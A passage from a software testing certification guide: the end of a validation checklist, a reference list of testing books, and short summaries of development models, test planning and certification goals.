6. Has the state of duplicate input been
validated?
7. Has the state of entering the same
transaction twice been validated
(particularly from a web app)?
8. Has the state of concurrent update
been validated (i.e., two client systems
calling on the same master record at the
same time)?
RESPONSE
# Item
Yes No N/A Comments
1. Have the backup procedures been
validated?
2. Have the off-site storage procedures
been validated?
3. Have the recovery procedures been
validated?
4. Have the client side operating
procedures been validated?
D
References
I
t is each candidate’s responsibility to stay current in the field and to be aware of published
works and materials available for professional study and development. Software
Certifications recommends that candidates for certification continually research and stay
aware of current literature and trends in the field. There are many valuable references that
have not been listed here. These references are for informational purposes only.
Ambler, Scott. Web services programming tips and tricks: Documenting a Use Case. October
2000
The American Heritage® Science Dictionary, Copyright © 2002. Published by Houghton
Mifflin. All rights reserved.
Ammann, Paul and Jeff Offutt. Introduction to Software Testing. Cambridge University Press.
Antonopoulos, Nick and Lee Gillam. Cloud Computing. Springer.
Beck, Kent, Mike Beedle, Arie van Bennekum, Alistair Cockburn, Ward Cunningham, Martin
Fowler, James Grenning, Jim Highsmith, Andrew Hunt, Ron Jeffries, Jon Kern, Brian
Marick, Robert C. Martin, Steve Mellor, Ken Schwaber, Jeff Sutherland, Dave
Thomas. 2001, Per the above authors this declaration may be freely copied in any
form, but only in its entirety through this notice.
Beck, Kent. Test Driven Development: By Example. Addison-Wesley Professional, First
Edition, 2002.
Beizer, Boris. Software Testing Techniques. Dreamtech Press, 2002.
Black, Rex. Managing the Testing Process: Practical Tools and Techniques for Managing
Hardware and Software Testing. John Wiley & Sons, Inc., Second Edition, 2002.
Burnstein, Ilene. Practical Software Testing: A Process-Oriented Approach. Springer, 2003.
Copeland, Lee. A Practitioner’s Guide to Software Test Design. Artech House Publishers,
2003.
Craig, Rick D. and Stefan P. Jaskiel. Systematic Software Testing. Artech House Publishers,
2002.
Desikan, Srinivasan and Gopalaswamy Ramesh. Software Testing: Principles and Practice.
Pearson Education, 2006.
Dictionary.com Unabridged. Based on the Random House Dictionary, © Random House, Inc.
2014.
Dustin, Elfriede, et al. Quality Web Systems: Performance, Security, and Usability. Addison-
Wesley, First Edition, 2001.
Erl, Thomas. Service-oriented Architecture: Concepts, Technology, and Design. Pearson
Education, 2005.
Everett, Gerald D., Raymond McLeod Jr. Software Testing: Testing Across the Entire
Software Development Life Cycle. John Wiley & Sons.
Galin, Daniel. Software Quality Assurance: From Theory to Implementation. Pearson
Education, 2009.
Hetzel, Bill. Software Testing: A Standards-Based Guide. John Wiley & Sons, Ltd., 2007.
Holler, J., and etc. From Machine-to-Machine to the Internet of Things: Introduction to a New
Age of Intelligence. Academic Press, 2014
Hurwitz, Judith, Robin Bloor, Marcia Kaufman, and Fern Halper. Service Oriented
Architecture (SOA) For Dummies. John Wiley and Sons, Second Edition.
Joiner, Brian. “Stablie and Unstable Processes, Appropriate and Inappropriate Managerial
Action.” From an address given at a Deming User’s Group Conference in Cincinnati,
OH.
Jorgensen, Paul C. Software Testing: A Craftsman’s Approach. CRC Press, Second Edition,
2002.
Kand, Frank. A Contingency Based Approach to Requirements Elicitation and Systems
Development. London School of Economics, J. System Software 1998
Kaner, Cem. An Introduction to Scenario Testing. Florida Tech, June 2003.
Kaner, Cem, et al. Lessons Learned in Software Testing. John Wiley & Sons, Inc., First
Edition, 2001.
Lewis, William E. Software Testing and Continuous Quality Improvement. CRC Press, Third
Edition, 2010.
Li, Kanglin. Effective Software Test Automation: Developing an Automated Software Testing
Tool. Sybex Inc., First Edition, 2004.
Limaye. Software Testing: Principles, Techniques, and Tools. Tata McGraw Hill, 2009.
Marshall, Steve, et al. Making E-Business Work: A Guide to Software Testing in the Internet
Age. Newport Press Publications, 2000.
Recertification is crucial for software testing professionals to ensure their skills remain current with today's challenges. The International Software Certification Board requires testers to complete 120 hours of testing-related training every three years. This process encourages self-improvement and skill enhancement, ensuring professionals remain competitive and effective in their roles while maintaining the certification .
The V-Model enhances defect identification and removal by integrating verification tests into all stages of development. It allows test planning activities to start early in the project, running in parallel with requirements detailing. Verification techniques are utilized throughout the project to ensure defects are identified and removed in the stage of origin, resulting in shorter time to market, lower error correction costs, and fewer defects in the production system .
Software testing certification can improve value to co-workers by encouraging mentoring, sharing of knowledge, and skill enhancement among team members. Certified professionals often conduct training, encourage staff to seek certification, and serve as valuable resources for testing-related information, enhancing the overall competence and productivity of the team .
Candidates must satisfy educational and professional prerequisites, subscribe to the Code of Ethics, and review the Software Testing Body of Knowledge to identify areas requiring further study. Additionally, candidates need to have current experience in the relevant field and a significant breadth of knowledge to ensure they are well-prepared for the certification examination .
The Ad-hoc development model can lead to unpredictable process capabilities due to constant changes and modifications as work progresses. This approach results in inconsistent schedules, budgets, functionality, and product quality. Success may rely heavily on individual skill rather than a repeatable organization-wide method, risking long-term productivity, quality improvement, and organizational capability .
Key advantages of a comprehensive test plan include improved test coverage, avoidance of repetition, increased test efficiency, and a reduction in test numbers without missing defects. It prevents oversights, improves communication, provides education on test details, and fosters accountability. As a contract and roadmap, it defines the testing scope, ensuring clarity regarding in-scope and out-of-scope activities .
The Incremental Model enhances the development process by subdividing requirements into smaller, manageable projects called increments, allowing for partial products with real functionality to be delivered early. This results in faster delivery of functional software in contrast to the Waterfall Model, which often only delivers a complete product at the end of the cycle . Additionally, the Incremental Model allows modifications and iterations after each increment, making it adaptable to changing requirements, whereas the Waterfall Model follows a rigid sequential approach with minimal flexibility to accommodate feedback once a phase is complete . Each incremental delivery provides opportunities for testing and validation of functionality, improving the ability to address defects and requirements changes earlier in the process, thereby reducing risks and enhancing overall quality .
The strategic role of test planning in software testing is to serve as a foundational contract and roadmap for testing activities. A test plan outlines what will be tested, how it will be tested, the resources required, the schedule for testing activities, and potential risks involved. It ensures all stakeholders are aligned on the testing scope and objectives, improving communication and providing a basis for accountability . Test planning aids in integrating testing with the overall software development process by aligning the test schedule, budget, and resources with the overall project plan . It also helps improve test coverage and efficiencies, reducing the likelihood of missing defects without increasing the number of tests . Furthermore, test planning involves the strategic arrangement of items like test data, test environment, and communication mechanisms. By doing so, it supports the systematic execution of tests and allows the test process to evolve as conditions change .
The iterative development model addresses limitations of the Waterfall Model by allowing for more flexibility and adaptability during the development process. Unlike the rigid, linear approach of the Waterfall Model, which struggles with accommodating changes once the project is underway, the Iterative Model divides the project into small parts, enabling earlier demonstration of results and integration of user feedback. This flexibility is crucial as it acknowledges the often inevitable evolution of user requirements and project specifications during development . Furthermore, the Iterative Model is more resilient to the initial uncertainty surrounding requirements since it does not require complete information up front, allowing continuous refinement of the system through successive iterations . The model also shortens the time to deliver functional software to users, helping to meet their needs more rapidly compared to the long, inflexible processes of the Waterfall Model .
The primary goals of the Software Testing Certification Program established by the International Software Certification Board (ISCB) include defining the tasks associated with software testing duties to evaluate skill mastery, demonstrating an individual's willingness to improve professionally, acknowledging attainment of a standard of professional competency, aiding organizations in selecting and promoting qualified individuals, motivating personnel to maintain their professional competency, and assisting individuals in enhancing their organization's software testing programs .